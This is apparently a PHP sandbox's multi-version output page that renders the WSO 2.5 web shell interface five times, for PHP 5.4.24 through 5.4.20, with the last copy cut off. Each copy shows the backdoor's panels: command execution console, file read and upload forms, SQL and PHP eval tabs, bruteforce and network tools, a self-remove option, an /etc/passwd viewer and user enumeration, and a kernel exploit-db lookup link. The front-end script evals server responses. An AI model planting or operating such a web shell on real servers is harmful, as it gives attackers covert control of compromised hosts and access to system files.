<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.24 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.23
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.23 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.22
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.22 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.21
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.21 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.20
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else 